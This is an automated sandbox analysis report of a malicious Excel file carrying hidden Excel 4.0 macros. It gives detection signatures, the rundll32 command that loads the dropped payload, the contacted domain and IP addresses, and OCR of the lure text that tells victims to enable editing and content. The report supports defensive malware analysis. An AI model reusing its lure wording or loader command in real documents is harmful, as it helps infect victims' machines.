Loading ...

Play interactive tourEdit tour

Analysis Report 85095f36_by_Libranalysis.xls

Overview

General Information

Sample Name:85095f36_by_Libranalysis.xls
Analysis ID:412672
MD5:85095f36d19d0a0cc635a9e255730ea0
SHA1:8ec5f0d784134f08bce52949027a686cd099acd8
SHA256:a4a5606ff24d70f51f72a501a370ab2199548d4d3a88e904cb9cfafb824d8af2
Tags:SilentBuilder
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains embedded VBA macros
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6024 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6200 cmdline: rundll32 ..\ritofm.cvm,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6272 cmdline: rundll32 ..\ritofm.cvm1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6024, ProcessCommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, ProcessId: 6200

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: 85095f36_by_Libranalysis.xlsReversingLabs: Detection: 10%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknownHTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.7:49696 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.7:49698 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
Source: global trafficDNS query: name: signifysystem.com
Source: global trafficTCP traffic: 192.168.2.7:49696 -> 192.185.39.58:443
Source: global trafficTCP traffic: 192.168.2.7:49696 -> 192.185.39.58:443
Source: Joe Sandbox ViewIP Address: 192.185.39.58 192.185.39.58
Source: Joe Sandbox ViewIP Address: 192.185.32.232 192.185.32.232
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS traffic detected: queries for: signifysystem.com
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://api.aadrm.com/
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://api.cortana.ai
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://api.office.net
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://api.onedrive.com
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://augloop.office.com
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://cdn.entity.
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://clients.config.office.net/
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://config.edge.skype.com
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://cortana.ai
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://cortana.ai/api
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://cr.office.com
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://dev.cortana.ai
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://devnull.onenote.com
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://directory.services.
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://graph.windows.net
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://graph.windows.net/
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://lifecycle.office.com
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://login.windows.local
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://management.azure.com
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://management.azure.com/
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://messaging.office.com/
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://ncus.contentsync.
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://officeapps.live.com
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://onedrive.live.com
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://outlook.office.com/
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://outlook.office365.com/
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://powerlift-user.acompli.net
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://settings.outlook.com
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://staging.cortana.ai
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://tasks.office.com
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://wus2.contentsync.
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 2ECD44E8-C9E6-4D87-BE35-E1612EC8869C.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
Source: unknownHTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.7:49696 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.7:49698 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing, F :::: was a problem starting ..\ritofm.cvm1 / 14_ from the yellow bar above peci
Source: Screenshot number: 8Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Screenshot number: 8Screenshot OCR: Enable Content from the yellow bar above O ' WHY I CANNOT OPEN THIS DOCUMENT ? W You are using
Source: Document image extraction number: 5Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 5Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or An
Source: Document image extraction number: 14Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Document image extraction number: 14Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? w You are using IDS or
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: 85095f36_by_Libranalysis.xlsInitial sample: CALL
Source: 85095f36_by_Libranalysis.xlsInitial sample: CALL
Source: 85095f36_by_Libranalysis.xlsInitial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: 85095f36_by_Libranalysis.xlsInitial sample: Sheet size: 14902
Source: 85095f36_by_Libranalysis.xlsOLE indicator, VBA macros: true
Source: classification engineClassification label: mal76.expl.evad.winXLS@5/7@2/2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user~1\AppData\Local\Temp\{CC78C696-4CF8-4C70-9DB3-87FE13CED2BF} - OProcSessId.datJump to behavior
Source: 85095f36_by_Libranalysis.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: 85095f36_by_Libranalysis.xlsReversingLabs: Detection: 10%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
